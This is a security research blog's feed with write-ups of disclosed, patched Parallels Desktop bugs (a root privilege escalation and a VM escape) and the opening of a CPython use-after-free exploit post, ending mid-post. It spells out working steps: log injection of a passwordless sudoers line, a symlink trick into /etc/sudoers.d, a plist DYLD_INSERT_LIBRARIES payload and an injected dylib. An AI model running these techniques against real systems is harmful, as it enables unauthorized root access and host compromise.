Jekyll2023-12-31T08:52:10+00:00https://pwn.win/feed.xmlpwn.winA diary of security exploration.Turning a boring file move into a privilege escalation on Mac2023-10-28T00:00:00+00:002023-10-28T00:00:00+00:00https://pwn.win/2023/10/28/file-move-privesc-mac<p>While poking around <a href="https://www.parallels.com/products/desktop/" target="_blank">Parallels Desktop</a> I found a script which is invoked by a setuid-root binary, which has the following snippet:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">local </span><span class="nv">prl_dir</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">usr_home</span><span class="k">}</span><span class="s2">/Library/Parallels"</span>
<span class="k">if</span> <span class="o">[</span> <span class="nt">-e</span> <span class="s2">"</span><span class="nv">$prl_dir</span><span class="s2">"</span> <span class="nt">-a</span> <span class="o">!</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$prl_dir</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
</span>log warning <span class="s2">"'</span><span class="k">${</span><span class="nv">prl_dir</span><span class="k">}</span><span class="s2">' is not a directory. Renaming it."</span>
<span class="nb">mv</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$prl_dir</span><span class="s2">"</span><span class="o">{</span>,~<span class="o">}</span>
<span class="k">continue
fi</span>
</code></pre></div></div>
<p>Here <code class="language-plaintext highlighter-rouge">${usr_home}</code> represents the home directory of the user for which Parallels Desktop is installed. The code says
if <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> exists and is not a directory then move it to <code class="language-plaintext highlighter-rouge">~/Library/Parallels~</code>, presumably to back it up before creating this path as a directory.</p>
<p>However, given this is our home directory, we (a low privileged user) can create <code class="language-plaintext highlighter-rouge">~/Library/Parallels~</code> beforehand, and make it a symlink to another directory, for example. This would mean the code actually moves <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> <em>into</em> the directory pointed to by the symlink. Additionally, we can fully control the <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> file, it can have whatever content we want, or it could even be a symlink to some other file.</p>
<p>Great, so now we can move a file of controlled content, or a symlink, into an arbitrary directory. How can we use this to escalate our privileges to root?</p>
<p>Digging around the filesystem, some ways which came to mind:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">/etc/periodic/{daily,monthly,weekly}</code>
<ul>
<li>Files must be owned by root, which our file isn’t</li>
<li>Besides, I don’t want to wait days for this privesc</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">/etc/pam.d/</code>
<ul>
<li>Files must be owned by root, which our file isn’t</li>
<li>Filenames are important, we can’t use the <code class="language-plaintext highlighter-rouge">Parallels</code> filename for this</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">/etc/ssh/sshd_config.d/</code>
<ul>
<li>Could use something like <code class="language-plaintext highlighter-rouge">AuthorizedKeysCommand</code> and <code class="language-plaintext highlighter-rouge">AuthorizedKeysCommandUser</code> to execute a command as root</li>
<li>Would need a reboot or some other way to force sshd to reload its config</li>
<li>sshd would need to be running in the first place, which it’s not by default</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code>
<ul>
<li>Files must be owned by root, which our file isn’t</li>
<li>Files must not be world writeable</li>
</ul>
</li>
</ul>
<p>Of these, the hurdles which seemed easiest to overcome were those of <code class="language-plaintext highlighter-rouge">/etc/sudoers.d</code>. So I started digging for files which are owned by root, are not world-writeable, and we can partially control. With some searching I found <code class="language-plaintext highlighter-rouge">/var/log/install.log</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">-rw-r--r--</span>@ 1 root admin 637109 23 Jun 12:00 /var/log/install.log
</code></pre></div></div>
<p>It turns out we can write to this log using the <code class="language-plaintext highlighter-rouge">logger</code> utility, specifying the <code class="language-plaintext highlighter-rouge">install.error</code> priority. Like so:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>logger <span class="nt">-p</span> install.error <span class="s2">"Hello, World!"</span>
</code></pre></div></div>
<p><img src="/assets/file-move-privesc-mac/install_log1.png" alt="Log file entry" /></p>
<p>Even better, we can get our content onto a new line using a carriage return, which is replaced with a newline, like so:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>logger <span class="nt">-p</span> install.error <span class="si">$(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\r</span><span class="s2">Hello, World!"</span><span class="si">)</span>
</code></pre></div></div>
<p><img src="/assets/file-move-privesc-mac/install_log2.png" alt="Log file newline injection" /></p>
<p>We can use this to insert a line of sudo config:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>logger <span class="nt">-p</span> install.error <span class="si">$(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\r</span><span class="nv">$USER</span><span class="s2"> ALL=(ALL) NOPASSWD: ALL"</span><span class="si">)</span>
</code></pre></div></div>
<p><img src="/assets/file-move-privesc-mac/install_log3.png" alt="Log file sudo config" /></p>
<p>So now we have a log file with a bunch of invalid sudo config lines (i.e. normal log entries), with one line of valid sudo config, which says that our current user can use sudo with no password, allowing us to escalate our privileges.</p>
<p>Now we can make <code class="language-plaintext highlighter-rouge">~/Library/Parallels</code> a symlink pointing to <code class="language-plaintext highlighter-rouge">/var/log/install.log</code> and <code class="language-plaintext highlighter-rouge">~/Library/Parallels~</code> a symlink pointing to <code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code>. When we invoke the vulnerable script, which runs as root, it will move our symlink, pointing to the log file, into <code class="language-plaintext highlighter-rouge">/etc/sudoers.d/</code>.</p>
<p>After that we can run <code class="language-plaintext highlighter-rouge">sudo su</code>, which will follow the symlink, parse the log file, spitting out pages of errors about the invalid syntax of the log entries in the process (but kindly continuing processing) until it reaches a line of valid syntax which we’ve injected, and eventually we’ll be dropped into a root shell.</p>
<p>Hopefully other people find this trick useful, beyond just Parallels. You can find the code for this exploit <a href="https://github.com/kn32/parallels-file-move-privesc" target="_blank">on my GitHub</a>.</p>
<video width="100%" controls="" autoplay="" playsinline="" loop="">
<source src="/assets/file-move-privesc-mac/file_move_poc.mp4" type="video/mp4" />
</video>
<h2 id="timeline">Timeline</h2>
<ul>
<li><strong>2023-05-19</strong> - ZDI submission, assigned ZDI-CAN-21227</li>
<li><strong>2023-06-21</strong> - reported to vendor</li>
<li><strong>2023-07-06</strong> - fix released in version 18.3.2</li>
<li><strong>2023-12-19</strong> - public release of advisory, CVE-2023-50226</li>
</ul>While poking around Parallels Desktop I found a script which is invoked by a setuid-root binary, which has the following snippet: local prl_dir="${usr_home}/Library/Parallels" if [ -e "$prl_dir" -a ! -d "$prl_dir" ]; then log warning "'${prl_dir}' is not a directory. Renaming it." mv -f "$prl_dir"{,~} continue fi Here ${usr_home} represents the home directory of the user for which Parallels Desktop is installed. The code says if ~/Library/Parallels exists and is not a directory then move it to ~/Library/Parallels~, presumably to back it up before creating this path as a directory.Escaping Parallels Desktop with Plist Injection2023-05-08T00:00:00+00:002023-05-08T00:00:00+00:00https://pwn.win/2023/05/08/parallels-escape<p>This post details two bugs I found, a plist injection (CVE-2023-27328) and a race condition (CVE-2023-27327), which could be used to escape from a guest Parallels Desktop virtual machine. In this post I’ll break down the findings.</p>
<p>For anyone not familiar, <a href="https://www.parallels.com/products/desktop/" target="_blank">Parallels Desktop</a> offers virtualization on macOS. It allows you to run virtual machines, like Windows or Linux, on a macOS host.</p>
<h2 id="toolgate--parallels-tools">Toolgate & Parallels Tools</h2>
<p>Toolgate is the protocol used for communication between the guest and host in Parallels, and it’s a great place to start looking for bugs due to its large attack surface and relatively immature security posture.</p>
<p>On x86 guests (which I’ll be using as an example for this blog post) Toolgate requests are sent to the host from the guest by writing the physical address of a <code class="language-plaintext highlighter-rouge">TG_REQUEST</code> struct to a specific I/O port.</p>
<p>A request structure consists of an opcode (<code class="language-plaintext highlighter-rouge">Request</code>), a status field (<code class="language-plaintext highlighter-rouge">Status</code>) which is updated by the host to indicate the status of a request, optional inline data (if <code class="language-plaintext highlighter-rouge">InlineByteCount</code> > 0), and an optional list of <code class="language-plaintext highlighter-rouge">TG_BUFFER</code> structs (if <code class="language-plaintext highlighter-rouge">BufferCount</code> > 0).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_TG_REQUEST</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="n">Request</span><span class="p">;</span> <span class="c1">// opcode</span>
<span class="kt">unsigned</span> <span class="n">Status</span><span class="p">;</span> <span class="c1">// request status</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">InlineByteCount</span><span class="p">;</span> <span class="c1">// number of inline bytes</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">BufferCount</span><span class="p">;</span> <span class="c1">// number of buffers</span>
<span class="kt">unsigned</span> <span class="n">Reserved</span><span class="p">;</span> <span class="c1">// reserved</span>
<span class="cm">/* [ inline bytes ] */</span>
<span class="cm">/* [ TG_BUFFERs ] */</span>
<span class="p">}</span> <span class="n">TG_REQUEST</span><span class="p">;</span>
</code></pre></div></div>
<p>Parallels Tools is software which can be installed in a guest (similar to VirtualBox Guest Additions, or VMWare Tools) which adds various useful features, such as shared folders, shared clipboard, and drag-and-drop in/out of the VM.</p>
<p>Parallels Tools also adds a channel for userland processes to make Toolgate requests. On Linux this is a proc entry created at <code class="language-plaintext highlighter-rouge">/proc/driver/prl_tg</code>, which is created and managed by the <code class="language-plaintext highlighter-rouge">prl_tg</code> kernel module, and on Windows this is a named pipe at <code class="language-plaintext highlighter-rouge">\\.\pipe\parallels_tools_pipe</code>. Parallels Tools also contains various userland processes and services which use this channel to facilitate these useful features.</p>
<p>Importantly there is a restriction on what Toolgate messages userland processes can send to the host using the channel created by Parallels Tools, which is enforced by the <code class="language-plaintext highlighter-rouge">prl_tg</code> kernel module. Specifically, the opcode (aka the <code class="language-plaintext highlighter-rouge">Request</code> field) must be greater than the value of <code class="language-plaintext highlighter-rouge">TG_REQUEST_SECURED_MAX</code>, which is defined as <code class="language-plaintext highlighter-rouge">0x7fff</code>, otherwise the write to the proc entry will fail with <code class="language-plaintext highlighter-rouge">EINVAL</code>. We can see the code for this here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cm">/* read request header from userspace */</span>
<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">ureq</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">TG_REQUEST</span><span class="p">)))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="cm">/*
* requests up to TG_REQUEST_SECURED_MAX are for drivers only and are
* denied by guest driver if come from user space to maintain guest
* kernel integrity (prevent malicious code from sending FS requests)
* dynamically assigned requests start from TG_REQUEST_MIN_DYNAMIC
*/</span>
<span class="k">if</span> <span class="p">(</span><span class="n">src</span><span class="o">-></span><span class="n">Request</span> <span class="o"><=</span> <span class="n">TG_REQUEST_SECURED_MAX</span><span class="p">)</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</code></pre></div></div>
<p>As suggested by the comment, the only Toolgate opcodes which are less than this threshold are those which handle filesystem operations. This means that if we want to send filesystem-related Toolgate requests, we have to bypass this check. More on this later.</p>
<h2 id="shared-applications">Shared Applications</h2>
<p>Shared Applications is a Parallels feature which allows opening files on a Mac in a guest application, and vice versa. It also allows associating file extensions and URL schemes with guest applications. You can read more about this in the <a href="https://download.parallels.com/desktop/v18/docs/en_US/Parallels%20Desktop%20User's%20Guide/33332.htm">documentation</a>.</p>
<p>This feature includes the display of an application’s icon in the Mac dock when it’s launched within a guest. Here’s an example of what it looks like when Microsoft Edge is opened in a Windows guest. We can see that the Edge icon shows up in the dock:
<img src="/assets/parallels-plist-escape/sga_mac_dock.gif" alt="animation showing Edge appearing in Mac dock when started in a VM" /></p>
<p>Parallels handles the “syncing” of running guest apps to the host by monitoring for new applications launched in the guest, and then sending Toolgate requests to the host when a new application has started. The host handles these messages by creating and starting “helper” apps, which have the same name and icon as the app in the guest. These helper apps are then displayed in the Mac dock when they are running, and can be used to launch the respective application in the guest from the dock or Launchpad when they are not running.</p>
<p>This syncing process effectively works like this:</p>
<ol>
<li>Parallels Tools detects an application is launched in the guest</li>
<li>It sends a Toolgate request (<code class="language-plaintext highlighter-rouge">TG_REQUEST_FAVRUNAPPS</code>, opcode <code class="language-plaintext highlighter-rouge">0x8302</code>) to the host notifying it that an application has launched with a given name and icon</li>
<li>If a helper app already exists for this guest app, then that helper app is launched and we’re done</li>
<li>If the helper app doesn’t exist, a new app bundle is created in <code class="language-plaintext highlighter-rouge">~/Applications (Parallels)/<vm_uuid> Applications.localized/</code></li>
<li>The app bundle is created from a template, which is filled in using information supplied by the guest. The information sent from the guest, as part of the Toolgate request, includes the app name, description and icon, amongst other things. This information is written into several files in the new app bundle, including the <a href="https://developer.apple.com/documentation/bundleresources/information_property_list">Info.plist</a>, which is the (XML) file in an app bundle which includes metadata about the bundle</li>
<li>The new helper app is launched, so it shows up in the dock</li>
</ol>
<p>The helper app contains a binary called <code class="language-plaintext highlighter-rouge">WinAppHelper</code>, which is copied directly from the template and exists as the entry point for the app bundle. When the app is run this binary will parse the Parallels-specific configuration files in the app bundle (e.g. <code class="language-plaintext highlighter-rouge">AppParams.pva</code>) and send a message to the corresponding guest VM to start the relevant application, if it’s not already running.</p>
<p>Here you can see a snippet of the Info.plist template, which is taken from the hypervisor binary. The highlighted placeholders are replaced with guest supplied input.
<img src="/assets/parallels-plist-escape/plist_template.png" alt="Plist template" /></p>
<p>Given that the host is taking input from the guest and using it to fill an Info.plist template, it is important that all input from the guest is appropriately escaped or sanitized, so it is not possible to inject XML into the plist and modify the behaviour of the helper app. I found that the escaping <em>was</em> done for all of the fields provided by the guest, apart from two, the URL schemes and the file extensions. These allow registering file extensions and URL schemes which the guest app will handle, respectively.</p>
<p>This means we could send our own Toolgate request (opcode <code class="language-plaintext highlighter-rouge">0x8302</code>), to tell the host to create a helper app, with a malicious URL scheme or file extension. In my case I chose to exploit the URL schemes, which were written unescaped into the <code class="language-plaintext highlighter-rouge">CFBundleURLSchemes</code> array, in Info.plist.</p>
<p>The relevant template for creating the <code class="language-plaintext highlighter-rouge">CFBundleURLSchemes</code> array looks like this:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt"><key></span>CFBundleURLTypes<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>CFBundleURLName<span class="nt"></key></span>
<span class="nt"><string></span>Supported protocols<span class="nt"></string></span>
<span class="nt"><key></span>CFBundleURLSchemes<span class="nt"></key></span>
<span class="nt"><array></span>
%1
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">%1</code> is replaced with the guest-provided URL schemes, each wrapped in <code class="language-plaintext highlighter-rouge"><string></string></code> tags. The completed template is then inserted into the Info.plist template later on.</p>
<p>This is what it looks like in code form:
<img src="/assets/parallels-plist-escape/url_schemes_template.png" alt="URL scheme template" /></p>
<p>One way this can be abused is by using the <a href="https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/20001431-106825">LSEnvironment</a> key to set the <code class="language-plaintext highlighter-rouge">DYLD_INSERT_LIBRARIES</code> environment variable. This can be used to force the helper binary (WinAppHelper) to load an arbitrary dylib when executed. I did spend a while looking for other features of an Info.plist which I could exploit without requiring a second bug, but I wasn’t able to find anything better. I’d be very keen to hear any alternative ideas for exploitation.</p>
<p>For example, if we provide the following string as a URL scheme:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code> evil<span class="nt"></string></span>
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
<span class="nt"><key></span>LSEnvironment<span class="nt"></key></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>DYLD_INSERT_LIBRARIES<span class="nt"></key></span>
<span class="nt"><string></span>/path/to/malicious.dylib<span class="nt"></string></span>
<span class="nt"></dict></span>
<span class="nt"><key></span>blabla<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></key></span>
<span class="nt"><array></span>
<span class="nt"><string></span>
</code></pre></div></div>
<p>This gets wrapped in <string> tags and inserted into the template, resulting in something like this:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt"><key></span>CFBundleURLTypes<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>CFBundleURLName<span class="nt"></key></span>
<span class="nt"><string></span>Supported protocols<span class="nt"></string></span>
<span class="nt"><key></span>CFBundleURLSchemes<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><string></span>evil<span class="nt"></string></span>
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
<span class="nt"><key></span>LSEnvironment<span class="nt"></key></span>
<span class="nt"><dict></span>
<span class="nt"><key></span>DYLD_INSERT_LIBRARIES<span class="nt"></key></span>
<span class="nt"><string></span>/path/to/malicious.dylib<span class="nt"></string></span>
<span class="nt"></dict></span>
<span class="nt"><key></span>blabla<span class="nt"></key></span>
<span class="nt"><array></span>
<span class="nt"><dict></span>
<span class="nt"><key></key></span>
<span class="nt"><array></span>
<span class="nt"><string></span>
<span class="nt"></array></span>
<span class="nt"></dict></span>
<span class="nt"></array></span>
</code></pre></div></div>
<p>Now when WinAppHelper is executed it will load a dylib of our choice. If we can make use of an existing dylib which does something interesting, or create our own dylib on disk somewhere, then we can use this to get code execution on the host.</p>
<h2 id="getting-a-file-write">Getting a File Write</h2>
<p>To complete the goal of code execution on the host with no user interaction, I needed to find a way to write a controlled dylib to a known location on the host. Unfortunately there were no files in the helper app bundle which I controlled in their entirety (including e.g. the app icon). Shared folders seemed like a good place to look for bugs which could allow us to do this.</p>
<p>Shared folders in Parallels are actually implemented using Toolgate, which has opcodes for all aspects of file management, including opening, reading and writing files. The shared folder filesystem kernel module (<code class="language-plaintext highlighter-rouge">prl_fs</code>), writes the relevant Toolgate instructions to the host when filesystem operations occur in the guest, and the host then performs the requested operation.</p>
<p>As mentioned earlier, all of these opcodes are forbidden by the communication channel created by Parallels Tools, which means to send filesystem-related opcodes we need to load our own kernel module to do this, which unfortunately requires root permissions. To do this I took the existing <code class="language-plaintext highlighter-rouge">prl_tg</code> code and made some modifications to remove the security checks.</p>
<p>Once we can write arbitrary messages to Toolgate, we can open files in a shared folder using the <code class="language-plaintext highlighter-rouge">TG_REQUEST_FS_L_OPEN</code> (<code class="language-plaintext highlighter-rouge">0x223</code>) opcode. In the hypervisor, file paths are constructed by appending the file path provided by the guest to the configured shared folder path on the host. There are some security checks when handling an open request to make sure the guest can’t open files outside of the host shared folder path, including:</p>
<ul>
<li>Checking if the file path contains <code class="language-plaintext highlighter-rouge">..</code>, which should have already been canonicalized by the guest</li>
<li>Checking if the file is a symlink which points outside of the share</li>
<li>Opening the constructed path and checking if the resulting file is outside of the shared folder on the host, which is done using the <code class="language-plaintext highlighter-rouge">F_GETPATH</code> option of <code class="language-plaintext highlighter-rouge">fcntl</code>.</li>
</ul>
<p>If any of these checks fail then Parallels will refuse to open the file and will return an error to the guest. The checks themselves look good, but the issue was a time-of-check to time-of-use (TOCTOU) opportunity between when the security checks happened and when the file was actually opened. This meant that if we quickly switched the path from a normal file to a symlink pointing to a path outside of the share on the host, after the security checks, but before the open, then the hypervisor would open the target of the symlink on the host for us. After that we could simply read from or write to the opened file using subsequent calls to Toolgate. In other words, this gives us the ability to read or write any file on the host, assuming the host process has permissions.</p>
<p><img src="/assets/parallels-plist-escape/toctou.gif" alt="animation showing how to exploit the TOCTOU with a symlink" /></p>
<p>Ok, but why do we need Toolgate requests for this, if the shared folders filesystem does it for us? In theory this bug <em>should</em> be exploitable by just performing the race with files in a shared folder, without sending manual Toolgate requests. However, in practice, trying to exploit this race through only filesystem operations triggers a bug in the <code class="language-plaintext highlighter-rouge">prl_fs</code> kernel module which results in a kernel oops.</p>
<h2 id="combining-the-two">Combining the two</h2>
<p>The first bug allows us to load any dylib on the host, and the second bug gives us the ability to write an arbitrary file anywhere on the host filesystem (assuming the Parallels process has permissions). Therefore we can create a malicious dylib, write it to a known location on the host, and force a helper app to load it, which will give us code execution with no user interaction.</p>
<p>We can use the following code compiled into a dylib, which will pop a calculator when the dylib is loaded.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
</span>
<span class="kt">void</span> <span class="nf">__attribute__</span> <span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="n">pwn</span><span class="p">()</span> <span class="p">{</span>
<span class="n">unsetenv</span><span class="p">(</span><span class="s">"DYLD_INSERT_LIBRARIES"</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"osascript -e 'tell application </span><span class="se">\"</span><span class="s">Calculator.app</span><span class="se">\"</span><span class="s"> to activate'"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h2 id="exploit-demonstration">Exploit Demonstration</h2>
<video width="100%" controls="" autoplay="" playsinline="" loop="">
<source src="/assets/parallels-plist-escape/full_chain.mp4" type="video/mp4" />
</video>
<h2 id="conclusion">Conclusion</h2>
<p>This chain can be exploited from within any guest operating system by any code with elevated privileges, which are necessary to use the privileged instructions needed to write arbitrary Toolgate requests. If Parallels Tools is installed, then the plist injection bug can be exploited with low privileges, but the file write bug still requires loading our own kernel module to bypass the security restrictions and send our own filesystem-related Toolgate requests.</p>
<p>Overall, Parallels is a fun target. Based on the bugs I and others have found I would say that it’s more immature than the likes of VirtualBox and VMWare, and I’m sure there are plenty more bugs to be found here.</p>
<p>You can find the code for these exploits <a href="https://github.com/kn32/parallels-plist-escape" target="_blank">on my GitHub</a>.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>Plist injection
<ul>
<li>Assigned CVE-2023-27328 / <a href="https://www.zerodayinitiative.com/advisories/ZDI-23-220/">ZDI-23-220</a></li>
<li><strong>2022-11-03</strong> - reported to vendor</li>
<li><strong>2022-12-13</strong> - fix released in version 18.1.1</li>
<li><strong>2023-03-07</strong> - public release of advisory</li>
</ul>
</li>
<li>File open TOCTOU
<ul>
<li>Assigned CVE-2023-27327 / <a href="https://www.zerodayinitiative.com/advisories/ZDI-23-215/">ZDI-23-215</a></li>
<li><strong>2022-11-03</strong> - reported to vendor</li>
<li><strong>2022-12-13</strong> - fix released in version 18.1.1</li>
<li><strong>2023-03-07</strong> - public release of advisory</li>
</ul>
</li>
</ul>This post details two bugs I found, a plist injection (CVE-2023-27328) and a race condition (CVE-2023-27327), which could be used to escape from a guest Parallels Desktop virtual machine. In this post I’ll break down the findings.Exploiting a Use-After-Free for code execution in every version of Python 32022-05-11T00:00:00+00:002022-05-11T00:00:00+00:00https://pwn.win/2022/05/11/python-buffered-reader<p>A while ago I was browsing the Python <a href="https://bugs.python.org">bug tracker</a>, and I stumbled upon this bug - “<a href="https://bugs.python.org/issue15994">memoryview to freed memory can cause segfault</a>”. It was created in 2012, originally present in Python 2.7, but remains open to this day, 10 years later. This piqued my interest, so I decided to take a closer look.</p>
<p>What follows is a breakdown of the root cause and how I wrote a reliable exploit which works in every version of Python 3.</p>
<h2 id="python-objects">Python Objects</h2>
<p>To understand anything happening in CPython it’s important to have an understanding of how objects are represented internally. I’ll give a brief introduction here, but there are several (better) resources on the internet for learning about this.</p>
<p>Everything in Python is an object. CPython represents these objects with the <code class="language-plaintext highlighter-rouge">PyObject</code> struct. Every type of object extends the basic <code class="language-plaintext highlighter-rouge">PyObject</code> struct with their own specific fields. A <code class="language-plaintext highlighter-rouge">PyObject</code> looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_object</span> <span class="p">{</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_refcnt</span><span class="p">;</span>
<span class="n">PyTypeObject</span> <span class="o">*</span><span class="n">ob_type</span><span class="p">;</span>
<span class="p">}</span> <span class="n">PyObject</span><span class="p">;</span>
</code></pre></div></div>
<p>A list, for example, is represented by a <code class="language-plaintext highlighter-rouge">PyListObject</code>, which looks roughly like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span>
<span class="n">PyObject</span> <span class="n">ob_base</span><span class="p">;</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_size</span><span class="p">;</span>
<span class="n">PyObject</span> <span class="o">**</span><span class="n">ob_item</span><span class="p">;</span>
<span class="n">Py_ssize_t</span> <span class="n">allocated</span><span class="p">;</span>
<span class="p">}</span> <span class="n">PyListObject</span><span class="p">;</span>
</code></pre></div></div>
<p>We can see that every object has a refcount (<code class="language-plaintext highlighter-rouge">ob_refcnt</code>) and a pointer to its corresponding type object (<code class="language-plaintext highlighter-rouge">ob_type</code>), in <code class="language-plaintext highlighter-rouge">ob_base</code>. The type object is a singleton and there exists one for every type in the Python language. For example, an int will point to <code class="language-plaintext highlighter-rouge">PyLong_Type</code>, and a list will be point to <code class="language-plaintext highlighter-rouge">PyList_Type</code>.</p>
<p>With that out of the way, let’s look at the PoC.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>The author of the bug report kindly included a proof of concept which will trigger a null pointer dereference. You can see that here:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">io</span>
<span class="k">class</span> <span class="nc">File</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">RawIOBase</span><span class="p">):</span>
<span class="k">def</span> <span class="nf">readinto</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">buf</span><span class="p">):</span>
<span class="k">global</span> <span class="n">view</span>
<span class="n">view</span> <span class="o">=</span> <span class="n">buf</span>
<span class="k">def</span> <span class="nf">readable</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="n">f</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">BufferedReader</span><span class="p">(</span><span class="n">File</span><span class="p">())</span>
<span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># get view of buffer used by BufferedReader
</span><span class="k">del</span> <span class="n">f</span> <span class="c1"># deallocate buffer
</span><span class="n">view</span> <span class="o">=</span> <span class="n">view</span><span class="p">.</span><span class="n">cast</span><span class="p">(</span><span class="s">'P'</span><span class="p">)</span>
<span class="n">L</span> <span class="o">=</span> <span class="p">[</span><span class="bp">None</span><span class="p">]</span> <span class="o">*</span> <span class="nb">len</span><span class="p">(</span><span class="n">view</span><span class="p">)</span> <span class="c1"># create list whose array has same size
</span> <span class="c1"># (this will probably coincide with view)
</span><span class="n">view</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># overwrite first item with NULL
</span><span class="k">print</span><span class="p">(</span><span class="n">L</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="c1"># segfault: dereferencing NULL
</span></code></pre></div></div>
<h2 id="root-cause">Root Cause</h2>
<p>The comments in the PoC provide some indication as to what is going on, but I’ll try to break it down further.</p>
<p>This bug is a fairly typical use-after-free, but to understand it we must first understand what <code class="language-plaintext highlighter-rouge">io.BufferedReader</code> does. The <a href="https://docs.python.org/3/library/io.html#io.BufferedReader">documentation</a> does a good job of explaining it:</p>
<blockquote>
<p>A buffered binary stream providing higher-level access to a readable, non seekable <a href="https://docs.python.org/3/library/io.html#io.RawIOBase" title="io.RawIOBase"><code class="language-plaintext highlighter-rouge">RawIOBase</code></a> raw binary stream. It inherits <a href="https://docs.python.org/3/library/io.html#io.BufferedIOBase" title="io.BufferedIOBase"><code class="language-plaintext highlighter-rouge">BufferedIOBase</code></a>.</p>
<p>When reading data from [the BufferedReader], a larger amount of data may be requested from the underlying raw stream, and kept in an internal buffer. The buffered data can then be returned directly on subsequent reads.</p>
</blockquote>
<p>In the proof of concept we first define a class called <code class="language-plaintext highlighter-rouge">File</code>, which inherits from <code class="language-plaintext highlighter-rouge">io.RawIOBase</code>, and define some methods on it. We then create a <code class="language-plaintext highlighter-rouge">BufferedReader</code> object, specifying an instance of the custom <code class="language-plaintext highlighter-rouge">File</code> class as the underlying raw stream.</p>
